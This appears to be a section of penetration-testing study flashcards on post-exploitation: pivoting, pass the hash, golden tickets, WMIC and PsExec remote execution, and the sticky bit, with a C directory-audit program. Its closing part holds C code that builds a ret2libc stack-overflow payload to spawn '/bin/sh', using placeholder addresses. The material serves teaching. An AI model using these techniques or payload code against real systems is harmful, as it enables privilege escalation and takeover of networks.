Section 15: Post-Exploitation Flashcards
Pivoting vs Lateral Movement
Lateral Movement
▪ A technique to progressively move through a network to search for the key data and assets that are ultimately the target of an attack campaign
Pivoting
▪ The use of one compromised computer to attack a different computer
▪ Pivoting routes the attacker's traffic through the compromised system to reach other systems on its network, bypassing restrictions such as firewall rules that block direct access from the attacker's own host
Pass the Hash
Reuses a captured NTLM password hash to authenticate as that user without knowing the plaintext password. It works against local workstations and anywhere NTLM authentication is still accepted, which includes most Active Directory domains; where Kerberos is required, the attacker needs a Kerberos ticket instead (pass the ticket)
Golden Ticket
A forged Kerberos ticket-granting ticket (TGT), created with the domain's krbtgt hash, that the attacker can use to request service tickets for any service in the Active Directory domain
▪ Golden tickets can grant administrative access to other domain members and domain controllers, and they remain valid until the krbtgt account password is changed (twice, because the previous key is also honored)
krbtgt hash
The trust anchor of the Active Directory domain, which functions like the private key of a root certificate authority: the KDC uses the krbtgt account's key to encrypt and sign the ticket-granting tickets (TGTs) that users present to obtain service tickets within Kerberos. Anyone holding the krbtgt hash can therefore forge TGTs (golden tickets)
Windows Management Instrumentation Command-Line (WMIC)
The command-line interface to Windows Management Instrumentation (WMI). It lets administrators query and manage local and remote Windows computers and start processes on them (for example, wmic /node:HOST process call create "command"), which also makes it a common lateral movement and remote execution tool for attackers. WMIC is deprecated in favor of PowerShell's CIM cmdlets
PsExec
A Sysinternals tool developed as a lightweight alternative to Telnet and other remote access services. It runs a program on a remote Windows host by copying a service binary to the ADMIN$ share and starting it over SMB; because that service runs as the Windows SYSTEM account, PsExec (with the -s option) can execute commands as SYSTEM, which attackers use for lateral movement and privilege escalation
Sticky Bit
Regular behavior: In a normal directory, any user who has write permissions to that directory can create, modify, or delete files within it.
Sticky bit behavior: When the sticky bit is set on a directory, only the owner of a file within that directory, the owner of the directory, or root can delete or rename that file, even if other users have write permissions to the directory.
Think of the sticky bit as a kind of "protection" for the files inside a shared directory. It ensures that each user can manage their own files, but they cannot accidentally or intentionally delete or rename files owned by other users (whether they can modify a file's contents is still governed by that file's own permissions). This is commonly used in shared directories, like the /tmp directory on Unix-like systems, to prevent users from deleting or replacing each other's temporary files.
In summary, the sticky bit is a permission that allows users to work collaboratively in a shared directory while protecting the ownership and integrity of individual files within that directory.
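As an added example (not part of the original flashcards), the following C program checks the sticky bit the way an audit script would, using stat() and the S_ISVTX flag, and flags the dangerous combination: a world-writable directory with no sticky bit. The scratch directory names under /tmp are assumptions for the demo; the mode is applied with chmod after mkdir because the process umask would otherwise strip bits from the mode passed to mkdir.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Return 1 if `path` is a directory with the sticky bit (S_ISVTX) set,
 * 0 if it is a directory without it, -1 on error or if not a directory. */
static int dir_sticky(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0 || !S_ISDIR(st.st_mode))
        return -1;
    return (st.st_mode & S_ISVTX) ? 1 : 0;
}

/* The audit question that matters: is this directory writable by everyone
 * AND missing the sticky bit?  That combination lets any user delete or
 * rename any other user's files in it.  Returns 1 if unprotected, 0 if safe
 * (not world-writable, or sticky bit set), -1 on error. */
static int dir_unprotected_shared(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0 || !S_ISDIR(st.st_mode))
        return -1;
    int world_writable = (st.st_mode & S_IWOTH) != 0;
    int sticky = (st.st_mode & S_ISVTX) != 0;
    return (world_writable && !sticky) ? 1 : 0;
}

/* Create a scratch directory under /tmp (an assumed location for the demo)
 * and apply `mode` to it.  Writes the path into `out`.  Returns 0 on
 * success, -1 on error.  chmod is used after mkdir because mkdir's mode
 * argument is masked by the umask, so 01777 would not survive it. */
static int make_scratch_dir(mode_t mode, const char *tag, char *out, size_t out_len)
{
    snprintf(out, out_len, "/tmp/sticky_demo_%s_%ld", tag, (long)getpid());
    if (mkdir(out, 0700) != 0 && errno != EEXIST)
        return -1;
    if (chmod(out, mode) != 0)
        return -1;
    return 0;
}

int main(void)
{
    char shared[64], loose[64];
    if (make_scratch_dir(01777, "shared", shared, sizeof shared) != 0 ||
        make_scratch_dir(0777, "loose", loose, sizeof loose) != 0) {
        perror("make_scratch_dir");
        return 1;
    }
    /* 01777 is how /tmp is normally configured; 0777 is the risky case. */
    printf("%s  sticky=%d  unprotected=%d\n", shared,
           dir_sticky(shared), dir_unprotected_shared(shared));
    printf("%s  sticky=%d  unprotected=%d\n", loose,
           dir_sticky(loose), dir_unprotected_shared(loose));
    rmdir(shared);
    rmdir(loose);
    return 0;
}
```

On a live system the same check is usually run as `find / -xdev -type d -perm -0002 ! -perm -1000`; the C version shows exactly which mode bits that command is testing.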
Ret2libc
A control-flow hijacking technique for stack buffer overflows on systems with a non-executable stack: instead of injecting shellcode, the attacker overwrites the saved return address so that execution returns into an existing libc function such as system(), and places a fake return address and a pointer to a command string (for example "/bin/sh") on the stack where that function expects its arguments. It yields privilege escalation when the vulnerable program runs setuid or as a more privileged service
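As an added example (not from the original flashcards), the following C code builds the classic 32-bit x86 ret2libc payload layout described above, so the stack frame that system() sees is visible byte by byte. It assumes the cdecl calling convention (arguments on the stack) and a little-endian target; the addresses used in main() are placeholders, not values from any real binary. On a real target the attacker obtains them from gdb or ldd (or an information leak) after checking whether ASLR is enabled.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Write a 32-bit value little-endian, the way an x86 target reads it off the stack. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/*
 * Lay out the classic 32-bit x86 ret2libc payload in `out`:
 *
 *   [ pad filler ][ &system ][ fake return addr ][ &"/bin/sh" ]
 *
 * `pad` bytes overwrite the buffer and saved EBP up to the saved return
 * address.  The vulnerable function's `ret` pops &system into EIP; system()
 * then finds the stack exactly as after a normal call: the next word is the
 * address it will return to when it finishes, and the word after that is
 * its first cdecl argument, the command string.  Nothing here executes from
 * the stack, which is why NX/DEP does not stop it.
 * Returns the payload length, or 0 if `out` is too small.
 */
static size_t build_ret2libc_payload(unsigned char *out, size_t out_len,
                                     size_t pad, uint32_t system_addr,
                                     uint32_t ret_addr, uint32_t binsh_addr)
{
    size_t need = pad + 3 * 4;
    if (out_len < need)
        return 0;
    memset(out, 'A', pad);                 /* filler up to the saved EIP     */
    put_le32(out + pad, system_addr);      /* overwrites the saved EIP       */
    put_le32(out + pad + 4, ret_addr);     /* where system() returns to      */
    put_le32(out + pad + 8, binsh_addr);   /* argument: pointer to "/bin/sh" */
    return need;
}

/* Practical check: if the payload is delivered through strcpy()/gets()-style
 * copying, an embedded NUL byte truncates it.  Returns the index of the
 * first NUL in the payload, or -1 if there is none. */
static long first_nul(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            return (long)i;
    return -1;
}

int main(void)
{
    unsigned char payload[128];
    /* Placeholder addresses (made up for this demo, not from a real target). */
    size_t n = build_ret2libc_payload(payload, sizeof payload, 76,
                                      0xf7e3d2e0u,   /* &system            */
                                      0x41414141u,   /* fake return address */
                                      0xf7f5e0cfu);  /* &"/bin/sh"          */
    printf("payload length: %zu, first NUL at: %ld\n", n, first_nul(payload, n));
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", payload[i], (i % 16 == 15) ? "\n" : " ");
    printf("\n");
    return 0;
}
```

The fake return address is whatever the attacker wants to happen after system() returns; 0x41414141 crashes the process, while the address of exit() makes the exit clean and less noticeable in logs. A libc address that contains a 0x00 byte (common for the low address range of a non-PIE binary) cannot be delivered through a NUL-terminated copy, which is what first_nul() is checking.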